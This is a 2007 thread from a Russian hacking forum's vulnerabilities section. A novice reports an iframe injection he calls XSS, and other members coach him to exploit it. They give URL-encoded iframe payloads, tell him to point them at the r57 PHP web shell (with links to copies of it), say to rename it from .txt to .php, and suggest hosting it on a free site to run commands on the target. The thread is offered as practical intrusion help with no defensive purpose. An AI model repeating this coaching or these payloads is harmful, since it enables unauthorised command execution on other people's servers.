ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Xss->...
  #1  
Старый 15.10.2007, 16:56
Аватар для Qwertison
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
Провел на форуме:
297955

Репутация: -5
Question Xss->...

Есть уязвимость которая позволяет подставить
Код:
%3CIFRAME%20SRC=http://ha.ckers.org/scriptlet.html%20%3C
в запрос и выскочит окно с xss (точнее окно _http://ha.ckers.org/scriptlet.html) Что еще можно загрузить на эту страницу? (не вообще что только можно, а что-то полезное для себя)
 

  #2  
Старый 15.10.2007, 17:02
Аватар для kair
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

Цитата:
<SCRIPT LANGUAGE="JavaScript">alert('XSS')</SCRIPT>
может это инклуд а не xss!? xss исполняется на уязвимом сайте
если это инклуд ты можешь сделать так

%3CIFRAME%20SRC=http://ya.ru идолжен появится яндекс

или так
%3CIFRAME%20SRC=http://hack.net/r57shell.php

Последний раз редактировалось kair; 15.10.2007 в 17:07..
 

  #3  
Старый 15.10.2007, 17:05
Аватар для Qwertison
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
Провел на форуме:
297955

Репутация: -5
По умолчанию

Код:
%3CIFRAME%20SRC=http://ya.ru%20%3C
яндекс появился))
Код:
%3CIFRAME%20SRC=http://hack.net/r57shell.php
- что это даст?

Последний раз редактировалось Qwertison; 15.10.2007 в 17:08..
 

  #4  
Старый 15.10.2007, 17:08
Аватар для kair
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

значит это инклуд!!! подставляй вместо яндекса шелл
 

  #5  
Старый 15.10.2007, 17:10
Аватар для Qwertison
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
Провел на форуме:
297955

Репутация: -5
По умолчанию

инклуд!!инклуд!!(что это такое?) шелла там нет где ты указал(
 

  #6  
Старый 15.10.2007, 17:13
Аватар для kair
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

http://www.security-frog.org/hack/r57shell-inversa.txt
и выполняй команды
можешь взять любой шелл по адресу
https://forum.antichat.ru/thread20314.html

Последний раз редактировалось kair; 15.10.2007 в 17:18..
 

  #7  
Старый 15.10.2007, 17:18
Аватар для Qwertison
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
Провел на форуме:
297955

Репутация: -5
По умолчанию

как команды выполнять? вылезло окошечко такое же как и на __http://www.security-frog.org/hack/r57shell-inversa.txt__ Всмысле текст тхт, нет меню как у залитого шелла...
 

  #8  
Старый 15.10.2007, 17:19
Аватар для kair
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

вместо txt пиши php
%3CIFRAME%20SRC=http://www.security-frog.org/hack/r57shell-inversa.php
 

  #9  
Старый 15.10.2007, 17:21
Аватар для Qwertison
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
Провел на форуме:
297955

Репутация: -5
По умолчанию

Error 404!

/hack/r57shell-inversa.php
File Not Found!
 

  #10  
Старый 15.10.2007, 17:55
Аватар для delay(0)
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343

Репутация: 141
По умолчанию

Цитата:
Error 404!

/hack/r57shell-inversa.php
File Not Found!
Сохрани этот файл у себя на компе, переименуй в .php, загрузи на народ.ру и подставляй адрес до него.
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss-туннелинг: твой трафик в Xss канале Mo4x Чужие Статьи 6 19.07.2007 16:13
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Продаю самые Красивые номера. Красивые 5,6 знаки. Кирпич ICQ - Покупка, продажа 3 09.04.2004 18:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ